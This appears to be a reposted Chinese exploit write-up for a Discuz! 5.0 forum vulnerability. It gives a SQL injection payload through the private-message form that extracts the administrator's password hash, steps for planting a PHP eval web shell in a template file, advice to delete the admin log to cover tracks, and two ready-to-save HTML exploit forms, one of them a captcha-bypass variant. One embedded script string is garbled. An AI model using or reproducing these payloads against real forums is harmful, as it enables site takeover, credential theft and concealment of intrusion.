SQL:
0) union select password,2,0 from cdb_members where uid=1/*
uid=1/* 1
就是ID值
获得管理员md5密码后
进后台
论坛管理 模块编辑 详情
修改wap.php插入
eval($_POST[tlwbw])
连接地址
网站地址+/templates/default/wap.lang.php
哈哈进过后台别忘了清掉forumdata/cplog.php
利用代码 保存为 .html
以下是引用片段:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Dz5.0 0day</TITLE>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META content="MSHTML 6.00.3790.2858" name=GENERATOR></HEAD>
<BODY>
<STYLE>BODY {
SCROLLBAR-FACE-COLOR: #e4e4f3; FONT-SIZE: 9pt; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #e4e4f3; COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #e4e4f3; SCROLLBAR-ARROW-COLOR: #4444b3; SCROLLBAR-TRACK-COLOR: #efefef; FONT-FAMILY: "Courier New"; SCROLLBAR-DARKSHADOW-COLOR: #9c9cd3
}
TABLE {
BORDER-RIGHT: #d8d8f0 1px; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse
}
.tr {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3; TEXT-ALIGN: center
}
.td {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
.warningColor {
FONT-SIZE: 9pt; COLOR: #ff0000; FONT-FAMILY: "Courier New"
}
INPUT {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
TEXTAREA {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
A:link {
FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none
}
TR {
FONT-SIZE: 9pt; LINE-HEIGHT: 18px; FONT-FAMILY: "Courier New"
}
TD {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"
}
.trHead {
FONT-SIZE: 9pt; LINE-HEIGHT: 3px; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3
}
.inputLogin {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; VERTICAL-ALIGN: bottom; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
</STYLE>
<SCRIPT language=JavaScript>
<!--
test='width="760" <table align="center" border="0" cellspacing="0"><form cellpadding="0" height="22" method="post"><tr><td Exp</td></tr><tr><td class="td"> Dz5.0 height="18" class="trHead"> </td></tr><tr><td <input class="td"> Url: type="text" name="theAction" value="http://www.***.net" id="theAction" onBlur=this.form.the2Action.value=this.form.theAction.value+"/pm.php?action=send&pmsubmit=yes"><BR><input size="50" type="hidden" name="the2Action" value=""> Hash: id="the2Action" type="text" <input value="0094b488"> Msgt<input name="formhash" name="msgto" type="text" value="jackal"><BR><input size="10" name="subject" type="hidden" value="aa"><input size="10" name="message" type="hidden" <input value="aa"> SQL: size="100" type="text" value="0) name="msgtobuddys[]" select union from password,2,0 where cdb_members class="td" uid=1/*"></td></tr><tr><td type="submit" align="center"><input value=" name="Submit" " GOGOGO type="reset" onClick="this.form.action=this.form.the2Action.value;"><input value=" name="Submit32" "></td></tr><tr><td Reset height="22" class="trHead"> </td></tr><tr><td class="td">Powered align="right" <a By title="QQ:***">***</a> href="http://www***.net" </tr> 2007.3 </td> </table> </form>';
document.write(ReplaceDemo(test))
//-->
</SCRIPT>
<TABLE cellSpacing=0 cellPadding=0 width=760 align=center border=0>
<FORM method=post>
<TBODY>
<TR>
<TD class=td height=22> Dz5.0 Exp</TD></TR>
<TR>
<TD class=trHead> </TD></TR>
<TR>
<TD class=td height=18> Url: <INPUT id=theAction
onblur='this.form.the2Action.value=this.form.theAction.value+"/pm.php?action=send&pmsubmit=yes"'
size=50 value=http://www.4evil.org name=theAction><BR><INPUT
id=the2Action type=hidden name=the2Action> Hash: <INPUT
value=0094b488 name=formhash> Msgt<INPUT size=10
value=aspxp name=msgto><BR><INPUT type=hidden size=10 value=aa
name=subject><INPUT type=hidden value=aa name=message> SQL:
<INPUT size=100
value="0) union select password,2,0 from cdb_members where uid=1/*"
name=msgtobuddys[]></TD></TR>
<TR>
<TD class=td align=middle><INPUT onclick=this.form.action=this.form.the2Action.value; type=submit value=" Enter " name=Submit><INPUT type=reset value=" Reset " name=Submit32></TD></TR>
<TR>
<TD class=trHead> </TD></TR>
<TR>
<TD class=td align=right height=22>Just For Fun <A title=QQ:****
href="http://www.****.org">****</A>
2007.3 </TD></TR></FORM></TBODY></TABLE></BODY></HTML>
PM漏洞过短信验证的方法: (来源7贱的BLOG)
<HTML><HEAD><TITLE>discuz</TITLE>
<BODY>
<a href="http://1v1.name">http://1v1.name</a><FORM name=frm method=post target=_blank>Url: <INPUT
size=45 name=act> <INPUT
size=8 name=formhash> <INPUT onclick="Javascipt:action=document.all.act.value+'pm.php?action=send';frm.submit();" type=button value="提 交" name=Send><br><br>
MySQL:<INPUT
size=65 value='0) union select password,2,0 from cdb_members where uid=1/*'name=msgtobuddys[]>
<input type="text" name="seccodeverify" size="7">
<INPUT TYPE="hidden" NAME="pmsubmit" value="2">
<input type="hidden" name="subject" value="test">
<input type="hidden" name="message" value="test">
</FORM>
</BODY></HTML>